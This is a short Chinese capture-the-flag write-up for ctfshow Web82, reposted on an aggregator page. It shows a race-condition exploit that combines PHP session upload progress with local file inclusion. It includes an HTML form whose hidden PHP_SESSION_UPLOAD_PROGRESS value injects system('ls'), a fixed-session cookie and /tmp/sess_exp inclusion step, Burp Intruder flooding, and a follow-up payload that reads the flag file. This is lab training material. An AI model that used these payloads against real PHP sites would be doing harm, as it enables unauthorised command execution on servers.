当前位置: 首页 > news >正文

文件包涵条件竞争(ctfshow82)

news 2025/8/23 13:16:49

Web82

利用 session.upload_progress 包含文件漏洞

<!DOCTYPE html>

<html>

<body>

<form action="https://09558c1b-9569-4abd-bf78-86c4a6cb6608.challenge.ctf.show//" method="POST" enctype="multipart/form-data">

<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />

<input type="file" name="file" />

<input type="submit" value="submit" />

</form>

</body>

</html>

<?php

session_start();

?>

修改url地址,修改命令

上传文件bp抓包

添加cookie,清除参数

Cookie: PHPSESSID=exp

?file=/tmp/sess_exp

抓包发送到攻击模块

开始攻击

<?php system('cat fl0g.php'); ?>

http://www.lryc.cn/news/407389.html

相关文章:

  • 通信原理-思科实验三:无线局域网实验
  • *算法训练(leetcode)第三十一天 | 1049. 最后一块石头的重量 II、494. 目标和、474. 一和零
  • mac中如何使用obs推流以及使用vlc播放
  • shopee虾皮 java后端 一面面经 整体感觉不难
  • HydraRPC: RPC in the CXL Era——论文阅读
  • pve笔记
  • typecho仿某度响应式主题Xaink
  • springcloud RocketMQ 客户端是怎么走到消费业务逻辑的 - debug step by step
  • GPT-4o mini小型模型具备卓越的文本智能和多模态推理能力
  • Milvus 向量数据库进阶系列丨部署形态选型
  • 【React】详解受控表单绑定
  • 使用puma部署ruby on rails的记录
  • 如何在Linux上使用Ansible自动化部署
  • scrapy爬取城市天气数据
  • 一天搞定React(5)——ReactRouter(下)【已完结】
  • 微信小程序之计算器
  • 【logstash】logstash使用多个子配置文件
  • 暴风骑士S9电摩上市,定义青少年骑行安全新标准
  • spring security如何适配盐存在数据库中的密码
  • Go语言编程 学习笔记整理 第2章 顺序编程 后半部分
  • 美团后端二面
  • 学懂C语言(十六):对C语言作用域规则 局部变量、全局变量的认识
  • 关于TS(typescript)的理论知识
  • 【OpenCV C++20 学习笔记】基本图像容器——Mat
  • 枚举单例是怎么保证线程安全和防止反射的
  • 传知代码-智慧医疗:纹理特征VS卷积特征(论文复现)
  • 数据结构中的八大金刚--------八大排序算法
  • ACC2.【C语言】经验积累 栈区简单剖析
  • c# 索引器
  • 低代码如何加速数字化转型